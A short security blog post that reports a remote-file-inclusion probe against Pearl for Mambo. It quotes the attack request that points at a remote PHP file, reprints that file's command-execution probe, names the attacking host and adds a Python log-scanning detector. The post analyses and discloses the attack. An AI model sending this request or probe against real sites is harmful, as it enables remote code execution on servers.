On the 11th of December (04:17:52) I received the following request to this site:
"GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1"
Looks like someone is trying to exploit an RFI vulnerability in Pearl for Mambo. This particular issue was disclosed over a year ago and they are still scanning for it… Must be a lot of unpatched fish in the internet tubes…
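As an added example (not part of the original post), here is a small Python script that scans access-log lines for this kind of RFI attempt: it flags any query parameter whose value is an absolute URL with a remote or stream-wrapper scheme, which is exactly how the request above would be caught. The log lines are constructed; the first one reproduces the request quoted above, the timestamp year and the other two lines are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log (Apache-style). The first line mirrors the
# request quoted in the post; the timestamp year and the other two lines are
# made up to show benign traffic for comparison.
SAMPLE_LOG = """\
80.237.200.81 - - [11/Dec/2000:04:17:52 +0100] "GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1" 200 512
192.0.2.10 - - [11/Dec/2000:04:18:03 +0100] "GET /includes/search.php?q=posidonia HTTP/1.1" 200 2048
192.0.2.11 - - [11/Dec/2000:04:19:44 +0100] "GET /index.php?option=com_content&id=42&ref=site.example/page HTTP/1.1" 200 4096
"""

# Minimal parser for the request part of a common/combined log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)"'
)

# Schemes that PHP's include() would fetch remotely or treat as a stream
# wrapper when allow_url_include is enabled.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data"}


def find_rfi_attempts(log_text):
    """Return (client_ip, parameter, value) for every query parameter whose
    value is an absolute URL with a remote or stream-wrapper scheme."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m.group("target")).query
        # parse_qsl also URL-decodes, so %68ttp%3A%2F%2F style encoding is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if urlsplit(value).scheme.lower() in REMOTE_SCHEMES:
                hits.append((m.group("ip"), name, value))
    return hits


if __name__ == "__main__":
    for ip, param, url in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} RFI attempt via {param}={url}")
```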
The file that is supposed to be included is live and contains the following:
<?php
// Marker string; scanners typically check the response for it to confirm
// that the remote file was included and executed.
echo "549821347819481<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."<br>";
// Tries each PHP command-execution function in turn until one is available.
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;
The attacking host was:
80.237.200.81 (jam.seppenra.de)
Windows CE, Generic Gecko
Cologne, Germany,DE,50.9333,6.95
Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007
What about doing error checking to verify that the target contains vulnerable code? It doesn’t take much time and seems like a reasonable thing to do if you want to stay (at least a little bit) under the radar.
Anyhow, this gave me a good idea which I will present in a future post.
All involved system owners have been notified.